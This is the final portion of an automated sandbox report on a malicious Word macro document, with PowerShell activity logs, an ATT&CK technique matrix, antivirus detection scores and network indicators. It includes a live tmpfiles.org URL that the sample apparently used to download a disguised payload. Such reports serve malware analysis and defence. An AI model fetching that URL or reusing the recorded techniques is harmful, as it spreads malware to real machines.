Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	13 Exploitation for Client Execution	2 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
test.doc.bin.doc	51%	Virustotal		Browse
test.doc.bin.doc	34%	ReversingLabs	Script-Macro.Trojan.Valyria
test.doc.bin.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\~WRD0000.tmp	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg	0%	Avira URL Cloud	safe
https://tmpfiles.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		high
tmpfiles.org	104.21.21.16	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tmpfiles.org	powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000006.00000002.2132433413.0000000004F01000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000006.00000002.2134721327.00000000057DA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBjq	powershell.exe, 00000006.00000002.2132433413.0000000004771000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.2132433413.0000000004771000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000006.00000002.2132433413.0000000004C69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.2132433413.00000000048C5000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.21.16	tmpfiles.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583048
Start date and time:	2025-01-01 17:19:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	test.doc.bin.doc
Detection:	MAL
Classification:	mal96.expl.evad.winDOC@5/14@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 83% Number of executed functions: 10 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 52.109.89.19, 199.232.214.172, 184.28.90.27, 104.208.16.90, 52.111.231.25, 52.111.231.24, 52.111.231.26, 52.111.231.23, 95.101.111.179, 95.101.111.168, 23.196.3.185, 23.196.3.178, 104.124.11.186, 104.124.11.138, 20.190.159.68, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-000.roaming.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, onedscolprdcus14.centralus.cloudapp.azure.com, fe3cr.d
Execution Graph export aborted for target powershell.exe, PID 5144 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:20:28	API Interceptor	26x Sleep call for process: powershell.exe modified

LLM Input / Output

Input	Output
